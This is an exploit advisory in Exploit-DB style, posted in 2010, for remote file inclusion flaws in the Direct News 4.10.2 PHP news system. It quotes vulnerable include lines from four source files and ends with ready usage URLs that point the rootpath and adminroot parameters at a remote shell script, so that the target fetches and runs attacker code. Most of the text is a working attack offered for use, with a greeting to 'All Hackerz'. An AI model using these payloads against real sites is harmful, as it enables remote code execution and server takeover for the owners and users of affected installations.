Direct News 4.10.2 - Multiple Remote File Inclusions
Author: mat
type: webapps
platform: php
port:
date_added: 2010-03-24
date_updated:
verified: 1
codes: OSVDB-63236;CVE-2010-1342;OSVDB-63235;OSVDB-63234;OSVDB-63233
tags:
aliases:
screenshot_url:
application_url:
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Direct News 4.10.2 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/directnews/downloads/list
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
( )
ooooO ) /
( ) (_/
\ (
\_)
#################################################
#Vuln Code (directnews-4.10-open-20090506/admin/menu.php)
#
#<?...
#include_once $rootpath .'/library/lib.menu.php';
#include_once $rootpath .'/modules/menu/lib/treemenu.inc.php';
#...?>
#################################################
#################################################
#Vuln Code (directnews-4.10-open-20090506/admin/media/update_content.php)
#
#<?...
#require_once $adminroot . '/inc.php';
#require_once './lib.media.php';
#require_once $adminroot . '/verif_identite.php';
#...?>
#################################################
#################################################
#Vuln Code (directnews-4.10-open-20090506/library/class.backup.php)
#
#<?...
#require_once $adminroot .'/inc.php';
#...?>
#################################################
#################################################
#Vuln Code (directnews-4.10-open-20090506/library/lib.menu.php)
#
#<?...
#require_once $rootpath . '/library/class.menuPere.php';
#...?>
#################################################
Usage: http://[target]/[path]/admin/menu_xml.php?rootpath=http://[shellscript]
http://[target]/[path]/admin/media/update_content.php?adminroot=http://[shellscript]
http://[target]/[path]/library/class.backup.php?adminroot=http://[shellscript]
http://[target]/[path]/library/lib.menu.php?rootpath=http://[shellscript]
Greetings: All Hackerz